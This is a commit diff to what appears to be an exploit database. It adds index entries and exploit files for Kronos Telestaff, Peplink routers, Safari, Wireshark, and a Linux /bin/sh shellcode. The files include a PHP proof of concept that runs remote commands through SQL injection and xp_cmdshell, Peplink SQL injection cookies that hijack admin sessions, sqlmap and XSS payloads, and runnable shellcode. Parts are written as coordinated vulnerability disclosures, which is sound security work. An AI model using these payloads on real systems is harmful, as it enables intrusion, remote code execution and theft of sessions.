DB: 2017-06-07
8 new exploits Wireshark 2.2.6 - IPv6 Dissector Denial of Service Wireshark 2.2.0 to 2.2.12 - ROS Dissector Denial of Service Apple Safari 10.1 - Spread Operator Integer Overflow Remote Code Execution Home Web Server 1.9.1 build 164 - Remote Code Execution Linux/x86-64 - /bin/sh Shellcode (31 bytes) Kronos Telestaff < 2.92EU29 - SQL Injection WordPress Plugin Tribulant Newsletters 4.6.4.2 - File Disclosure / Cross-Site Scripting Peplink Balance Routers 7.0.0-build1904 - SQL Injection / Cross-Site Scripting / Information Disclosure
This commit is contained in:
parent
cd6e21e600
commit
0ef7d9b9ec
9 changed files with 799 additions and 0 deletions
|
@ -5528,6 +5528,8 @@ id,file,description,date,author,platform,type,port
|
|||
42110,platforms/linux/dos/42110.txt,"reiserfstune 3.6.25 - Local Buffer Overflow",2017-06-02,"Nassim Asrir",linux,dos,0
|
||||
42112,platforms/windows/dos/42112.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow",2017-06-02,n3ckD_,windows,dos,0
|
||||
42115,platforms/linux/dos/42115.txt,"DNSTracer 1.8.1 - Buffer Overflow",2017-06-05,FarazPajohan,linux,dos,0
|
||||
42123,platforms/multiple/dos/42123.txt,"Wireshark 2.2.6 - IPv6 Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0
|
||||
42124,platforms/multiple/dos/42124.txt,"Wireshark 2.2.0 to 2.2.12 - ROS Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -15565,6 +15567,8 @@ id,file,description,date,author,platform,type,port
|
|||
42060,platforms/linux/remote/42060.py,"Samba 3.5.0 - Remote Code Execution",2017-05-24,steelo,linux,remote,0
|
||||
42078,platforms/linux/remote/42078.js,"Google Chrome 60.0.3080.5 V8 JavaScript Engine - Out-of-Bounds Write",2017-05-26,halbecaf,linux,remote,0
|
||||
42079,platforms/hardware/remote/42079.txt,"CERIO DT-100G-N/DT-300N/CW-300N - Multiple Vulnerabilities",2017-05-28,LiquidWorm,hardware,remote,0
|
||||
42125,platforms/macos/remote/42125.txt,"Apple Safari 10.1 - Spread Operator Integer Overflow Remote Code Execution",2017-06-06,saelo,macos,remote,0
|
||||
42128,platforms/windows/remote/42128.txt,"Home Web Server 1.9.1 build 164 - Remote Code Execution",2017-05-26,"Guillaume Kaddouch",windows,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -16203,6 +16207,7 @@ id,file,description,date,author,platform,type,port
|
|||
41969,platforms/lin_x86/shellcode/41969.c,"Linux/x86 - Disable ASLR Shellcode (80 bytes)",2017-05-08,abatchy17,lin_x86,shellcode,0
|
||||
41970,platforms/lin_x86-64/shellcode/41970.asm,"Linux/x86-64 - Reverse Shell Shellcode (IPv6) (113 bytes)",2017-05-08,Srakai,lin_x86-64,shellcode,0
|
||||
42016,platforms/windows/shellcode/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",windows,shellcode,0
|
||||
42126,platforms/lin_x86-64/shellcode/42126.c,"Linux/x86-64 - /bin/sh Shellcode (31 bytes)",2017-06-05,"Touhid M.Shaikh",lin_x86-64,shellcode,0
|
||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||
|
@ -37952,3 +37957,6 @@ id,file,description,date,author,platform,type,port
|
|||
42117,platforms/windows/webapps/42117.txt,"Subsonic 6.1.1 - Cross-Site Request Forgery",2017-06-05,hyp3rlinx,windows,webapps,0
|
||||
42118,platforms/windows/webapps/42118.txt,"Subsonic 6.1.1 - Server-Side Request Forgery",2017-06-05,hyp3rlinx,windows,webapps,0
|
||||
42120,platforms/windows/webapps/42120.txt,"Subsonic 6.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2017-06-05,hyp3rlinx,windows,webapps,0
|
||||
42127,platforms/asp/webapps/42127.txt,"Kronos Telestaff < 2.92EU29 - SQL Injection",2017-06-05,"Goran Tuzovic",asp,webapps,0
|
||||
42129,platforms/php/webapps/42129.txt,"WordPress Plugin Tribulant Newsletters 4.6.4.2 - File Disclosure / Cross-Site Scripting",2017-06-06,defensecode,php,webapps,80
|
||||
42130,platforms/cgi/webapps/42130.txt,"Peplink Balance Routers 7.0.0-build1904 - SQL Injection / Cross-Site Scripting / Information Disclosure",2017-06-06,"X41 D-Sec GmbH",cgi,webapps,443
|
||||
|
|
Can't render this file because it is too large.
|
99
platforms/asp/webapps/42127.txt
Executable file
99
platforms/asp/webapps/42127.txt
Executable file
|
@ -0,0 +1,99 @@
|
|||
Software: Kronos Telestaff Web Application
|
||||
Version: < 2.92EU29
|
||||
Homepage: http://www.kronos.com/
|
||||
CERT VU: VU#958480
|
||||
CVE: (Pending)
|
||||
CVSS: 10 (Low; AV:N/AC:L/Au:N/C:C/I:C/A:C)
|
||||
CWE: CWE-89
|
||||
Vulnerable Component: Login page
|
||||
|
||||
Description
|
||||
================
|
||||
The login form is vulnerable to blind SQL injection by an unauthenticated user.
|
||||
|
||||
|
||||
Vulnerabilities
|
||||
================
|
||||
The vulnerability is due to the unsanitized POST parameter 'user' in login page:
|
||||
URL: [BASE URL OF Telestaff Application]/servlet/ServletController.asp
|
||||
POSTDATA=device=stdbrowser&action=doLogin&user=&pwd=&code=
|
||||
|
||||
The exploit requires a valid "code" in the post body. However in almost all instances we found on the internet, the "code" POST variable was hard-coded into the page. Furthermore, the "code" POST variable is very often a 4 digit number - and can be easily discovered in ~5000 requests.
|
||||
|
||||
|
||||
Proof of concept
|
||||
================
|
||||
PoC 1 - extract data from database
|
||||
example extract benign data e.g.
|
||||
Injection Point: [BASE URL OF Telestaff Application]/servlet/ServletController.asp
|
||||
POST data:
|
||||
device=stdbrowser&action=doLogin&user=')if(DB_NAME()='TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=<valid code>
|
||||
|
||||
compare timing with
|
||||
|
||||
device=stdbrowser&action=doLogin&user=')if(DB_NAME()<>'TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=<valid code>
|
||||
|
||||
|
||||
PoC 2 - Execute Code Remotely
|
||||
example inject benign code e.g. ping a remote systems
|
||||
|
||||
<?php
|
||||
$cmd_to_execute = strToHex("ping -n 1 receive_ping_host"); // insert you own host here to detect dns lookup and/or ping; or insert other command
|
||||
$code=XXXX // insert valid code
|
||||
$target_url= // insert login page url of target system i.e. example.com/webstaff-2.0/servlet/ServletController.asp?device=stdbrowser&action=doLogin&selfhosted=true
|
||||
$payload="DECLARE @lphda VARCHAR(280);SET @lphda=".$cmd_to_execute.";EXEC master..xp_cmdshell @lphda";
|
||||
$payload=str_replace(" ","%20",$payload);
|
||||
$postdata="device=stdbrowser&action=doLogin&user=')".$payload."---&pwd=test&code=".$code;
|
||||
|
||||
$ch = curl_init();
|
||||
curl_setopt($ch, CURLOPT_URL, $target_url);
|
||||
curl_setopt($ch, CURLOPT_POST, TRUE);
|
||||
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
|
||||
curl_exec($ch);
|
||||
|
||||
function strToHex($string){
|
||||
$hex = '';
|
||||
for ($i=0; $i<strlen($string); $i++){
|
||||
$ord = ord($string[$i]);
|
||||
$hexCode = dechex($ord);
|
||||
$hex .= substr('0'.$hexCode, -2);
|
||||
}
|
||||
return "0x".strToUpper($hex);
|
||||
}
|
||||
|
||||
|
||||
Affected Systems
|
||||
================
|
||||
From Vendor:
|
||||
Customers running TeleStaff version 2.x with Self Hosted Web Access, those customers who host their own web access, are affected and Kronos recommends that you upgrade to TeleStaff 2.92EU29 or Workforce TeleStaff.
|
||||
|
||||
|
||||
Solution
|
||||
================
|
||||
From Vendor:
|
||||
|
||||
Though there is no further action needed after the installation of the update there are a couple of best practices that we suggest to further secure the production environment.
|
||||
1. We recommend that the Web Staff Middle Tier be locked down to only be accessed from the source addresses. For Self-Hosted Web Access this would be the Internet facing IIS server hosting the Self Hosted WebStaff module. For customers using WebStaff (www.telestaff.net) and PSM (psm.telestaff.net and m.telestaff.net) those are the IP addresses of the Kronos servers.
|
||||
2. Customers, once configured, should remove the viewDatabases.asp script to avoid accidental information leakage to unauthorized users.
|
||||
|
||||
|
||||
Timeline
|
||||
================
|
||||
2015-12-18: Discovered
|
||||
2016-01-04: Contacted Vendor
|
||||
2016-01-11: Report sent to vendor
|
||||
2016-01-20: Received acknowledgement of vulnerable from security contact info at vendor
|
||||
2016-01-20: Vendor is remediating the issue
|
||||
2016-10-18: Vendor issues patch
|
||||
2017-06-01: Public disclosure
|
||||
|
||||
|
||||
Discovered by
|
||||
================
|
||||
Chris Anastasio 0x616e6173746173696f [ at ] illumant.com
|
||||
Mark F. Snodgrass 0x736e6f646772617373 [ at ] illumant.com
|
||||
|
||||
|
||||
About Illumant
|
||||
================
|
||||
Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks. Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant. For more information, visit https://illumant.com/
|
268
platforms/cgi/webapps/42130.txt
Executable file
268
platforms/cgi/webapps/42130.txt
Executable file
|
@ -0,0 +1,268 @@
|
|||
X41 D-Sec GmbH Security Advisory: X41-2017-005
|
||||
|
||||
Multiple Vulnerabilities in peplink balance routers
|
||||
===================================================
|
||||
|
||||
Overview
|
||||
--------
|
||||
Confirmed Affected Versions: 7.0.0-build1904
|
||||
Confirmed Patched Versions:
|
||||
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin
|
||||
Vulnerable Firmware:
|
||||
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin
|
||||
Models: Balance Routers 305, 380, 580, 710, 1350, 2500
|
||||
Vendor: Peplink
|
||||
Vendor URL: https://www.peplink.com/
|
||||
Vector: Network
|
||||
Credit: X41 D-Sec GmbH, Eric Sesterhenn
|
||||
Additional Credits: Claus Overbeck (Abovo IT)
|
||||
Status: Public
|
||||
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/
|
||||
|
||||
|
||||
Summary and Impact
|
||||
------------------
|
||||
Several issues have been identified, which allow attackers to access the
|
||||
administrative web interface with admin credentials, delete files,
|
||||
perform CSRF and XSS attacks.
|
||||
|
||||
|
||||
Product Description
|
||||
-------------------
|
||||
From the vendor webpage:
|
||||
Use Load Balancing and SpeedFusion bandwidth bonding to deliver
|
||||
superfast VoIP, video streaming, and data using an SD-WAN enabled
|
||||
network. Even with a basic Balance 20 dual-WAN router, you can mix
|
||||
different transport technologies and providers to keep your network up
|
||||
when individual links go down. Switching between links is automatic and
|
||||
seamless.
|
||||
|
||||
|
||||
|
||||
SQL Injection via bauth Cookie
|
||||
==============================
|
||||
Severity Rating: Critical
|
||||
Vector: Network
|
||||
CVE: CVE-2017-8835
|
||||
CWE: 89
|
||||
CVSS Score: 9.8
|
||||
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
|
||||
Summary and Impact
|
||||
------------------
|
||||
Peplink devices are vulnerable to an SQL injection attack via the bauth
|
||||
cookie parameter which is set e.g. when accessing
|
||||
https://ip/cgi-bin/MANGA/admin.cgi.
|
||||
|
||||
The injection can be checked with the following command:
|
||||
|
||||
./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi"
|
||||
--cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647"
|
||||
-p"bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ
|
||||
--flush-session -t trace.log --prefix "'" --suffix "--" -a
|
||||
|
||||
The vulnerability in the Peplink device allows to access the SQLite
|
||||
session database containing user and session variables. By using the the
|
||||
following cookie in a web request, it is possible to select a running
|
||||
administrator session to be used for the attackers login.
|
||||
|
||||
bauth=-12' or id IN (select s.id from sessions as s left join
|
||||
sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1')
|
||||
or '1'='2
|
||||
|
||||
By forming specialised SQL queries, it is possible to retrieve usernames
|
||||
from the database. This worked by returning a valid session in case the
|
||||
username existed and no session if it did not exist. In the first case
|
||||
the server did not set a new session cookie in the response to the request.
|
||||
|
||||
SELECT id FROM sessions WHERE sessionid = '-14' or id IN (select s.id
|
||||
from sessions as s left join sessionsvariables as v on v.id=s.id where
|
||||
v.name='username' and substr(v.value,1,3)='adm')
|
||||
|
||||
|
||||
|
||||
Workarounds
|
||||
-----------
|
||||
Install vendor supplied update.
|
||||
|
||||
|
||||
No CSRF Protection
|
||||
==================
|
||||
Severity Rating: Medium
|
||||
Vector: Network
|
||||
CVE: CVE-2017-8836
|
||||
CWE: 352
|
||||
CVSS Score: 5.4
|
||||
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
|
||||
|
||||
Summary and Impact
|
||||
------------------
|
||||
The CGI scripts in the administrative interface are not protected
|
||||
against cross site request forgery attacks. This allows an attacker to
|
||||
execute commands, if a logged in user visits a malicious website. This
|
||||
can for example be used to change the credentials of the administrative
|
||||
webinterface.
|
||||
|
||||
|
||||
Workarounds
|
||||
-----------
|
||||
Install vendor supplied update.
|
||||
|
||||
|
||||
|
||||
|
||||
Passwords stored in Cleartext
|
||||
=============================
|
||||
Severity Rating: Medium
|
||||
Vector: Network
|
||||
CVE: CVE-2017-8837
|
||||
CWE: 256
|
||||
CVSS Score: 4.0
|
||||
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
|
||||
Summary and Impact
|
||||
------------------
|
||||
The Peplink devices store passwords in cleartext in the files
|
||||
/etc/waipass and /etc/roapass. In case one of these devices is
|
||||
compromised the attacker can gain access to the cleartext passwords and
|
||||
abuse them to compromise further systems.
|
||||
|
||||
|
||||
Workarounds
|
||||
-----------
|
||||
Install vendor supplied update.
|
||||
|
||||
|
||||
|
||||
|
||||
XSS via syncid Parameter
|
||||
========================
|
||||
Severity Rating: Medium
|
||||
Vector: Network
|
||||
CVE: CVE-2017-8838
|
||||
CWE: 80
|
||||
CVSS Score: 5.4
|
||||
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
|
||||
|
||||
Summary and Impact
|
||||
------------------
|
||||
If the webinterface is accessible, it is possible to abuse the syncid
|
||||
parameter to trigger a cross-site-scripting issue by calling
|
||||
https://ip/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E
|
||||
|
||||
This executes the JavaScript in the victims browser, which can be abused
|
||||
to steal session cookies.
|
||||
|
||||
Workarounds
|
||||
-----------
|
||||
Install vendor supplied update.
|
||||
|
||||
|
||||
|
||||
|
||||
XSS via preview.cgi
|
||||
===================
|
||||
Severity Rating: Medium
|
||||
Vector: Network
|
||||
CVE: CVE-2017-8839
|
||||
CWE: 80
|
||||
CVSS Score: 5.4
|
||||
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
|
||||
|
||||
Summary and Impact
|
||||
------------------
|
||||
If the webinterface is accessible, it is possible to abuse the the
|
||||
orig_url parameter to trigger a cross-site-scripting issue in
|
||||
/guest/preview.cgi. The injection is directly into existing JavaScript.
|
||||
|
||||
This executes the JavaScript in the victims browser, which can be abused
|
||||
to steal session cookies.
|
||||
|
||||
Workarounds
|
||||
-----------
|
||||
Install vendor supplied update.
|
||||
|
||||
|
||||
|
||||
File Deletion
|
||||
=============
|
||||
Severity Rating: Medium
|
||||
Vector: Network
|
||||
CVE: CVE-2017-8841
|
||||
CWE: 73
|
||||
CVSS Score: 6.5
|
||||
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H
|
||||
|
||||
Summary and Impact
|
||||
------------------
|
||||
A logged in user can delete arbitrary files on the Peplink devices, by
|
||||
abusing the /cgi-bin/MANGA/firmware_process.cgi. When an absolute path
|
||||
is provided to the upfile.path parameter the file provided in the path
|
||||
is deleted during the process. This can be abused to cause a denial of
|
||||
service (DoS). In combination with the missing CSRF protection, this can
|
||||
be abused remotely via a logged in user.
|
||||
|
||||
Workarounds
|
||||
-----------
|
||||
Install vendor supplied update.
|
||||
|
||||
|
||||
|
||||
|
||||
Information Disclosure
|
||||
======================
|
||||
Severity Rating: Medium
|
||||
Vector: Network
|
||||
CVE: CVE-2017-8840
|
||||
CWE: 200
|
||||
CVSS Score: 5.3
|
||||
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
|
||||
Summary and Impact
|
||||
------------------
|
||||
If the webinterface is accessible, it is possible to retrieve sensitive
|
||||
information without a valid login by opening
|
||||
cgi-bin/HASync/hasync.cgi?debug=1
|
||||
|
||||
This displays the following:
|
||||
|
||||
-----8<------------------------------------------------
|
||||
Master LAN Address = [ <internal ip> / <netmask> ]
|
||||
Serial Number = [ <serial number> ]
|
||||
HA Group ID = [ <group id> ]
|
||||
Virtual IP = [ <internal ip> / <netmask> ]
|
||||
Submitted syncid = [ <syncid> ]
|
||||
-----8<------------------------------------------------
|
||||
|
||||
This information can be valuable for an attacker to exploit other issues.
|
||||
|
||||
Workarounds
|
||||
-----------
|
||||
Install vendor supplied update.
|
||||
|
||||
|
||||
|
||||
|
||||
About X41 D-Sec GmbH
|
||||
--------------------
|
||||
X41 D-Sec is a provider of application security services. We focus on
|
||||
application code reviews, design review and security testing. X41 D-Sec
|
||||
GmbH was founded in 2015 by Markus Vervier. We support customers in
|
||||
various industries such as finance, software development and public
|
||||
institutions.
|
||||
|
||||
Timeline
|
||||
--------
|
||||
2017-04-07 Issue found
|
||||
2017-04-10 Vendor asked for security contact
|
||||
2017-04-11 Vendor replied, send GPG key
|
||||
2017-04-11 Information supplied to vendor
|
||||
2017-04-11 Vendor acknowledges that the information is received
|
||||
2017-04-17 Vendor acknowledges SQL injection
|
||||
2017-05-08 CVE IDs for all issues requested
|
||||
2017-05-08 CVE IDs assigned
|
||||
2017-05-11 Vendor informed about CVE IDs
|
||||
2017-05-29 Version provided to X41 for testing
|
||||
2017-05-31 First test results send back to the vendor
|
||||
2017-06-01 Remaining test results send back to the vendor
|
||||
2017-06-05 Coordinated Firmware and Advisory release
|
62
platforms/lin_x86-64/shellcode/42126.c
Executable file
62
platforms/lin_x86-64/shellcode/42126.c
Executable file
|
@ -0,0 +1,62 @@
|
|||
/*
|
||||
;Title: Linux/x86-64 - /bin/sh Shellcode
|
||||
;Author: Touhid M.Shaikh
|
||||
;Contact: https://github.com/touhidshaikh
|
||||
;Category: Shellcode
|
||||
;Architecture: Linux x86_64
|
||||
;Description: This shellcode baased on "JMP CALL POP" method to Execute "/bin//sh". Length of shellcode is 31 bytes.
|
||||
;Tested on : #1 SMP PREEMPT RT Debian 4.9.25-1kali1 (2017-05-04)
|
||||
|
||||
|
||||
|
||||
===COMPILATION AND EXECUTION===
|
||||
#nasm -f elf64 shell.asm -o shell.o
|
||||
|
||||
#ld shell.o -o shell <=== Making Binary File
|
||||
|
||||
|
||||
#./bin2shell.sh shell <== xtract hex code from the binary(https://github.com/touhidshaikh/bin2shell)
|
||||
|
||||
=================SHELLCODE(INTEL FORMAT)=================
|
||||
|
||||
section .text
|
||||
global _start
|
||||
_start:
|
||||
jmp shell
|
||||
here:
|
||||
xor rax,rax
|
||||
pop rdi
|
||||
xor rsi,rsi
|
||||
xor rdx,rdx
|
||||
add rax,59
|
||||
syscall
|
||||
shell:
|
||||
call here
|
||||
bash db "/bin//sh"
|
||||
|
||||
===================END HERE============================
|
||||
|
||||
Compile with gcc with some options.
|
||||
|
||||
# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing
|
||||
|
||||
|
||||
*/
|
||||
|
||||
#include<stdio.h>
|
||||
#include<string.h>
|
||||
|
||||
unsigned char code[] = \
|
||||
"\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68";
|
||||
|
||||
main()
|
||||
{
|
||||
printf("Touhid Shaikh (http://www.touhidshaikh.com)\n");
|
||||
printf("Shellcode Length : %d\n", (int)strlen(code));
|
||||
|
||||
int (*ret)() = (int(*)())code;
|
||||
|
||||
ret();
|
||||
|
||||
}
|
||||
|
21
platforms/macos/remote/42125.txt
Executable file
21
platforms/macos/remote/42125.txt
Executable file
|
@ -0,0 +1,21 @@
|
|||
Sources:
|
||||
https://phoenhex.re/2017-06-02/arrayspread
|
||||
https://github.com/phoenhex/files/blob/master/exploits/spread-overflow
|
||||
|
||||
JavaScriptCore will allocate a JSFixedArray for every spread operand of the array literal (in slow_path_spread). As such, roughly 4 billion JSValues will have to be allocated, taking up 32 GiB in RAM. Luckily, this isn’t much of a problem due to the page compression performed by the macOS kernel. It will, however, take roughly a minute to trigger the bug.
|
||||
|
||||
What is left to do now is to perform some heap feng-shui to place something interesting on the heap that we will then overflow into. We use the following heap spray to exploit the bug:
|
||||
|
||||
- Allocate 100 JSArrays of size 0x40000 and root them (i.e. keep references). This will trigger GC multiple times and fill up holes in the heap.
|
||||
- Allocate 100 JSArrays of size 0x40000, where only every second one is rooted. This triggers GC and leaves holes of size 0x40000 in the heap.
|
||||
- Allocate a larger JSArray and an ArrayBuffer of the same size. These end up directly after the spray from step 2.
|
||||
- Allocate 4 GiB of padding using JSArrays.
|
||||
- Trigger the bug by concatenating JSArrays with a combined size of 232 + 0x40000 (containing the repeated byte 0x41).
|
||||
|
||||
The target buffer will be allocated in the sprayed region from step 2 and the victim buffers from step 3 will be overwritten. This increases the size of the victim array to the sprayed value (0x4141414141414141), so that it overlaps with the victim ArrayBuffer. The final steps immediately yield the fakeobj and addrof primitives described in section 1.2 of the JavaScriptCore phrack paper which can then be used to write code to a JIT page and jump to it.
|
||||
|
||||
In our exploit we perform step 5 in a separate web worker, so that we can launch a second stage shellcode immediately after the victim arrays are overwritten. This way we do not need to wait for the full overwrite to finish, and the heap is only left in a broken state for a very short time, so that garbage collection does not crash (which runs concurrently starting from Safari version 10.1).
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42125.zip
|
66
platforms/multiple/dos/42123.txt
Executable file
66
platforms/multiple/dos/42123.txt
Executable file
|
@ -0,0 +1,66 @@
|
|||
Build Information:
|
||||
TShark (Wireshark) 2.3.0 (v2.3.0rc0-3369-g2e2ba64b72)
|
||||
|
||||
Copyright 1998-2017 Gerald Combs <gerald@wireshark.org> and contributors.
|
||||
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
|
||||
This is free software; see the source for copying conditions. There is NO
|
||||
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||||
|
||||
Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
|
||||
with GLib 2.50.3, with zlib 1.2.11, without SMI, with c-ares 1.12.0, with Lua
|
||||
5.2.4, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with MIT Kerberos, with GeoIP,
|
||||
with nghttp2 1.20.0, with LZ4, with Snappy, with libxml2 2.9.4.
|
||||
|
||||
Running on Linux 4.10.13-1-ARCH, with Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz
|
||||
(with SSE4.2), with 31996 MB of physical memory, with locale C, with libpcap
|
||||
version 1.8.1, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with zlib 1.2.11.
|
||||
|
||||
Built using clang 4.2.1 Compatible Clang 4.0.0 (tags/RELEASE_400/final).
|
||||
--
|
||||
A problem was found by the oss-fuzz project:
|
||||
https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=1303
|
||||
|
||||
Attached is the sample that triggers this error which can be reproduced with an
|
||||
ASAN+UBSAN build of Wireshark ("tshark -Vr test.pcap").
|
||||
--
|
||||
wsutil/inet_ipv6.h:111:15: runtime error: member access within null pointer of type 'const struct e_in6_addr'
|
||||
#0 0x7f2b8106b2b8 in in6_is_addr_multicast wsutil/inet_ipv6.h:111:15
|
||||
#1 0x7f2b81068247 in dissect_routing6_rpl epan/dissectors/packet-ipv6.c:952:9
|
||||
#2 0x7f2b81052227 in dissect_routing6 epan/dissectors/packet-ipv6.c:1217:9
|
||||
#3 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
|
||||
#4 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
|
||||
#5 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
|
||||
#6 0x7f2b83a917c9 in dissector_try_uint epan/packet.c:1353:9
|
||||
#7 0x7f2b800c8361 in dissect_ayiya epan/dissectors/packet-ayiya.c:134:9
|
||||
#8 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
|
||||
#9 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
|
||||
#10 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
|
||||
#11 0x7f2b83a917c9 in dissector_try_uint epan/packet.c:1353:9
|
||||
#12 0x7f2b822f9326 in decode_udp_ports epan/dissectors/packet-udp.c:678:7
|
||||
#13 0x7f2b8230ee02 in dissect epan/dissectors/packet-udp.c:1131:5
|
||||
#14 0x7f2b822fe12f in dissect_udp epan/dissectors/packet-udp.c:1137:3
|
||||
#15 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
|
||||
#16 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
|
||||
#17 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
|
||||
#18 0x7f2b80a62252 in dissect_exported_pdu epan/dissectors/packet-exported_pdu.c:307:17
|
||||
#19 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
|
||||
#20 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
|
||||
#21 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
|
||||
#22 0x7f2b80b803e7 in dissect_frame epan/dissectors/packet-frame.c:521:11
|
||||
#23 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
|
||||
#24 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
|
||||
#25 0x7f2b83a9fe87 in call_dissector_only epan/packet.c:2992:8
|
||||
#26 0x7f2b83a88034 in call_dissector_with_data epan/packet.c:3005:8
|
||||
#27 0x7f2b83a87054 in dissect_record epan/packet.c:567:3
|
||||
#28 0x7f2b83a1f398 in epan_dissect_run_with_taps epan/epan.c:474:2
|
||||
#29 0x561364f21686 in process_packet_single_pass tshark.c:3419:5
|
||||
#30 0x561364f1a821 in process_cap_file tshark.c:3250:11
|
||||
#31 0x561364f12549 in main tshark.c:1955:17
|
||||
#32 0x7f2b754f9510 in __libc_start_main (/usr/lib/libc.so.6+0x20510)
|
||||
#33 0x561364dff4f9 in _start (run/tshark+0xd44f9)
|
||||
|
||||
SUMMARY: AddressSanitizer: undefined-behavior wsutil/inet_ipv6.h:111:15 in
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42123.zip
|
86
platforms/multiple/dos/42124.txt
Executable file
86
platforms/multiple/dos/42124.txt
Executable file
|
@ -0,0 +1,86 @@
|
|||
Source: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13637
|
||||
|
||||
Build Information:
|
||||
TShark (Wireshark) 2.3.0 (v2.3.0rc0-3235-gd97ce76161)
|
||||
|
||||
Copyright 1998-2017 Gerald Combs <gerald@wireshark.org> and contributors.
|
||||
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
|
||||
This is free software; see the source for copying conditions. There is NO
|
||||
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||||
|
||||
Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
|
||||
with GLib 2.50.3, with zlib 1.2.11, without SMI, with c-ares 1.12.0, with Lua
|
||||
5.2.4, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with MIT Kerberos, with GeoIP,
|
||||
with nghttp2 1.20.0, with LZ4, with Snappy, with libxml2 2.9.4.
|
||||
|
||||
